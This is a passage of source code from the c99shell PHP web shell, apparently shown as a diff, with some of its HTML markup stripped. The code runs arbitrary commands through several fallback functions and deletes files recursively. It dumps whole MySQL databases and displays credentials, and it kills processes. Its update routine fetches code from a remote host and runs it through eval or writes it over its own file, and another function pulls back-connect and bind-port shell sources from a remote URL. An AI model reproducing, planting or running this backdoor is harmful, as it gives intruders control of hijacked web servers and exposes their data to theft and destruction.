(is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - c99shell

    !C99Shell v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

